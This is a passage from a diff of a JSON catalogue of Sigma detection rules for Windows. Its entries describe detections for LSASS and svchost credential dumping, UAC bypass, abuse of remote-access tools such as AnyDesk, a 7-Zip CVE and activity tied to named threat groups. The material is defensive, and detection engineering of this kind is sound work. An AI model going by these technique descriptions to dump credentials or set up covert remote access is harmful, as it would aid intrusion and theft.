"level": "medium", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", - "value": "Rare GrantedAccess Flags on LSASS Access" - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/22", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", - "value": "Suspicious GrantedAccess Flags on LSASS Access" - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/27", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", - "value": "LSASS Access from Program in Suspicious Folder" - }, - { - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "meta": { - "author": "Florent Labouyrie", - "creation_date": "2021/04/30", - "falsepositive": [ - "Non identified legit exectubale" - ], - "filename": "proc_access_win_svchost_cred_dump.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" - ], - "tags": [ - "attack.t1548" - ] - }, - "uuid": "174afcfa-6e40-4ae9-af64-496546389294", - "value": "SVCHOST Credential Dump" - }, - { - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "value": "UAC Bypass Using WOW64 Logger DLL Hijack" - }, - { - "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", - "meta": { - "author": "frack113", - "creation_date": "2022/04/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "filename": "proc_creation_win_susp_control_dll_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/kagancapar/CVE-2022-29072", - "https://twitter.com/kagancapar/status/1515219358234161153", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" - ], - "tags": [ - "cve.2022.29072" - ] - }, - "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "value": "Suspicious 7zip Subprocess" - }, - { - "description": "Detection of unusual child processes by different system processes", - "meta": { - "author": "Semanur Guneysu @semanurtg, oscd.community", - "creation_date": "2020/10/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_abusing_debug_privilege.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", - "value": "Abused Debug Privilege by Arbitrary Parent Processes" - }, - { - "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112", - "attack.t1053" - ] - }, - "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", - "value": "Abusing Windows Telemetry For Persistence" - }, - { - "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", - "creation_date": "2020/10/13", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", - "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", - "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", - "value": "Accesschk Usage To Check Privileges" - }, - { - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "meta": { - "author": "@ROxPinTeddy, Nasreddine Bencherchali", - "creation_date": "2020/05/12", - "falsepositive": [ - "Legitimate administrative use" - ], - "filename": "proc_creation_win_advanced_ip_scanner.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" - ] - }, - "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", - "value": "Advanced IP Scanner" - }, - { - "description": "Detects the use of Advanced Port Scanner.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2021/12/18", - "falsepositive": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" - ], - "filename": "proc_creation_win_advanced_port_scanner.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" - ] - }, - "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", - "value": "Advanced Port Scanner" - }, - { - "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", - "meta": { - "author": "frack113", - "creation_date": "2021/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_alternate_data_streams.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", - "value": "Execute From Alternate Data Streams" - }, - { - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", - "value": "Always Install Elevated MSI Spawned Cmd And Powershell" - }, - { - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "System administrator usage", - "Anti virus products" - ], - "filename": "proc_creation_win_always_install_elevated_windows_installer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", - "value": "Always Install Elevated Windows Installer" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/11", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_anydesk.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", - "value": "Use of Anydesk Remote Access Software" - }, - { - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/28", - "falsepositive": [ - "Legitimate piping of the password to anydesk", - "Some FP could occure with similar tools that uses the same command line '--set-password'" - ], - "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", - "value": "AnyDesk Inline Piped Password" - }, - { - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "meta": { - "author": "Ján Trenčanský", - "creation_date": "2021/08/06", - "falsepositive": [ - "Legitimate deployment of AnyDesk" - ], - "filename": "proc_creation_win_anydesk_silent_install.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", - "https://support.anydesk.com/Automatic_Deployment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", - "value": "AnyDesk Silent Installation" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/20", - "falsepositive": [ - "Legitimate use of AnyDesk from a non-standard folder" - ], - "filename": "proc_creation_win_anydesk_susp_folder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "value": "Use of Anydesk Remote Access Software from Suspicious Folder" - }, - { - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2022/02/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_actinium_persistence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" - ] - }, - "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "value": "Scheduled Task WScript VBScript" - }, - { - "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/12/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_apt29_thinktanks.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" - ], - "tags": [ - "attack.execution", - "attack.g0016", - "attack.t1059.001" - ] - }, - "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", - "value": "APT29" - }, - { - "description": "Detects activity that could be related to Baby Shark malware", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/02/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_babyshark.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.001", - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1218.005" - ] - }, - "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "value": "Baby Shark Activity" - }, - { - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/02/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" - ] - }, - "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "value": "Judgement Panda Credential Access Activity" - }, - { - "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2019/10/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_bluemashroom.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ] - }, - "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "value": "BlueMashroom DLL Load" - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2018/03/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_chafer_mar18.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "value": "Chafer Activity" - }, - { - "description": "Detects wmiexec vbs version execution by wscript or cscript", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/04/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_cloudhopper.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" - ], - "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" - ] - }, - "uuid": "966e4016-627f-44f7-8341-f394905c361f", - "value": "WMIExec VBS Script" - }, - { - "description": "Detects CrackMapExecWin Activity as Described by NCSC", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/04/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_dragonfly.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", - "https://attack.mitre.org/software/S0488/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" - ], - "tags": [ - "attack.g0035", - "attack.credential_access", - "attack.discovery", - "attack.t1110", - "attack.t1087" - ] - }, - "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", - "value": "CrackMapExecWin" - }, - { - "description": "Detects Elise backdoor acitivty as used by APT32", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/01/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_elise.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" - ], - "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", - "value": "Elise Backdoor" - }, - { - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", - "https://twitter.com/cyb3rops/status/1168863899531132929", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", - "value": "Emissary Panda Malware SLLauncher" - }, - { - "description": "Detects EmpireMonkey APT reported Activity", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/04/02", - "falsepositive": [ - "Very Unlikely" - ], - "filename": "proc_creation_win_apt_empiremonkey.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ] - }, - "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", - "value": "Empire Monkey" - }, - { - "description": "Detects a specific tool and export used by EquationGroup", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/03/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", - "https://securelist.com/apt-slingshot/84312/", - "https://twitter.com/cyb3rops/status/972186477512839170", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" - ], - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "value": "Equation Group DLL_U Load" - }, - { - "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" + "https://twitter.com/rikvduijn/status/853251879320662017", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" ], "tags": [ "attack.defense_evasion", "attack.t1218.011" ] }, - "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", - "value": "EvilNum Golden Chickens Deployment via OCX Files" - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "meta": { - "author": "Tim Burrell", - "creation_date": "2020/02/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_gallium.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212", - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "18739897-21b1-41da-8ee4-5b786915a676", - "value": "GALLIUM Artefacts" - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "meta": { - "author": "Tim Burrell", - "creation_date": "2020/02/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_gallium_sha1.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212", - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", - "value": "GALLIUM Sha1 Artefacts" - }, - { - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/03/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" - ] - }, - "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", - "value": "Suspicious UltraVNC Execution" - }, - { - "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", - "meta": { - "author": 